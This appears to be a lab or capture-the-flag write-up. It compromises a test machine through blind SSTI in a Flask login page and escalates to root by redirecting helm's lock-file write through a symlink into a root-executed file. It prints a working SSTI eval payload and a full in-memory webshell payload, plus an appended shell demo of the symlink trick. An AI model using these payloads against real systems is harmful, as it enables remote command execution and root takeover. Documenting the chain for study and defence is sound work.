Host discovery

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo arp-scan -I eth1 192.168.56.1/24
[sudo] password for kali:
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: host part of 192.168.56.1/24 is non-zero
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:03 (Unknown: locally administered)
192.168.56.100 08:00:27:49:5f:2a PCS Systemtechnik GmbH
192.168.56.145 08:00:27:fc:77:b2 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.391 seconds (107.07 hosts/sec). 3 responded

Port scanning

┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -p- 192.168.56.145
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-19 05:00 EST
Nmap scan report for 192.168.56.145
Host is up (0.0030s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
MAC Address: 08:00:27:FC:77:B2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 107.50 seconds

Web

Port 8080 serves the login form of a management system. Whatever username/password you enter, the login succeeds and the page echoes the username back.

[screenshot]

I tried {{7*7}} to test for an SSTI (template injection) vulnerability; judging from what the page showed, there didn't seem to be one.

[screenshot]

Just when I had run out of other ideas, I fired off this SSTI payload: {{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('sleep%205').read()")}}

The page did return normally, but with a noticeable delay.

[screenshot]

So the SSTI vulnerability is there; the template output is simply never reflected in the response (blind SSTI), which is why the {{7*7}} probe could not show anything and a time-based payload was needed.

Next, plant an in-memory webshell. The payload below registers a before_request hook on the running Flask app: whenever a request carries an abking query parameter, the hook runs that value through os.popen and returns the output as the response, so nothing touches disk. The abking inside __subclasses__()[abking] is a placeholder for the index of a subclass whose __init__ globals expose __builtins__; that index has to be looked up on the target.

{{ ''.__class__.__mro__[-1].__subclasses__()[abking].__init__.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None, []).append(lambda: CmdResp if __import__('sys').modules['__main__'].__dict__['request'].args.get('abking') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(__import__('sys').modules['__main__'].__dict__['request'].args.get(\'abking\')).read())\")==None else None)") }}

[screenshot]

After that, commands can be executed through the abking parameter; they run as the eecho user.

[screenshot]

I then dropped my SSH public key into that account's authorized_keys and logged in over SSH as eecho.

[screenshot]

Privilege escalation

In eecho's home directory there is a SUID binary called game. It looks like it is just a game?

[screenshot]

Looking for other SUID files:

[screenshot]

helm has the SUID bit set, so it runs, and writes files, with its owner's privileges.

sudo -l then shows (ALL) NOPASSWD: /bin/bash /opt/data, i.e. whatever is in /opt/data gets executed by bash as root, no password required.

[screenshot]

So the plan is clear:

First, lose the game, which clears /opt/data.

Then use the Helm lock-file write bug from a while back to get a malicious command written into /opt/data.

Finally, run sudo /bin/bash /opt/data.

The target has no internet access, though, so the PoC from GitHub cannot be used as-is.

Instead the dependency is served from a local repository.

First run helm dependency update locally.

That produces a gatekeeper-3.19.2.tgz file under charts/.

[screenshot]

Copy that file over to the target.

[screenshots]

Then create Chart.yaml.

[screenshot]

Then symlink Chart.lock to /opt/data, so that whatever helm writes to its lock file lands in /opt/data.

[screenshot]

Then run game and deliberately lose, which empties /opt/data.

I had forgotten to change the repository field earlier; I fix it at this point.

[screenshot]

Once /opt/data is empty, run helm dependency build. It resolves the dependencies and rewrites Chart.lock; because Chart.lock is a symlink, the lock-file content, malicious command included, ends up in /opt/data.

[screenshot]

Finally, sudo /bin/bash /opt/data runs that file as root and the box is done.

[screenshot]
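The chain above rests on two properties that can be checked without helm, sudo or the target box: a write to a symlink lands in its target, and bash executes a YAML-shaped file line by line, so the ordinary lock-file lines just fail with "command not found" while a $(...) inside a field value is expanded, and therefore runs, before that failure. The following is an added demonstration, not part of the original write-up and not helm's code: a plain shell redirect stands in for the helm lock-file write, the lock-file text is constructed to resemble a Chart.lock, and temporary files stand in for /opt/data. A second function shows the obvious check a lock-file writer should make before opening a path it did not create.

```shell
# Added demo, not from the original write-up. A shell redirect stands in for
# the helm lock-file write; the YAML text below is constructed, not captured.

# Write through a symlink, then execute the link target with bash.
# Returns 0 if the injected command ran, non-zero otherwise.
demo_symlink_write_exec() {
    work="$(mktemp -d)" || return 1
    target="$work/data"            # stand-in for /opt/data
    marker="$work/pwned"           # created only if the injected command runs
    : > "$target"                  # "lose the game": the file exists but is empty
    ln -s "$target" "$work/Chart.lock"

    # Simulated lock-file writer: it opens Chart.lock, which is really $target.
    # The repository value carries a command substitution; bash expands it
    # even inside the double quotes a YAML writer would put around the value.
    cat > "$work/Chart.lock" <<EOF
dependencies:
- name: gatekeeper
  repository: "\$(touch $marker)"
  version: 3.19.2
digest: sha256:0000000000000000000000000000000000000000000000000000000000000000
generated: "2025-11-19T18:30:00Z"
EOF

    # The symlink target now holds the YAML, injected line included.
    grep -q 'touch' "$target" || { rm -rf "$work"; return 2; }

    # Run it the way the sudo rule would (here without root). Every ordinary
    # line ("dependencies:", "- name: ...") fails with "command not found" and
    # bash moves on to the next line; the $(...) is expanded before that.
    bash "$target" >/dev/null 2>&1 || true

    if [ -f "$marker" ]; then
        rm -rf "$work"; return 0
    fi
    rm -rf "$work"; return 3
}

# The check a lock-file writer should make: refuse to write through a symlink.
# Returns 0 if the write was refused, 1 if it went ahead.
safe_write_refuses_symlink() {
    work="$(mktemp -d)" || return 1
    : > "$work/data"
    ln -s "$work/data" "$work/Chart.lock"
    rc=1
    if [ -L "$work/Chart.lock" ]; then
        rc=0                        # symlink detected: do not write
    else
        printf 'dependencies: []\n' > "$work/Chart.lock"
    fi
    rm -rf "$work"
    return "$rc"
}
```

The demo uses bash on the lock file exactly as the sudo rule does, minus root, so a marker file appearing proves the injected substitution executed. The `[ -L ]` test in the second function is the minimum; a real writer should open with O_NOFOLLOW (or create the file under a fresh name and rename it into place) to close the window between the check and the open.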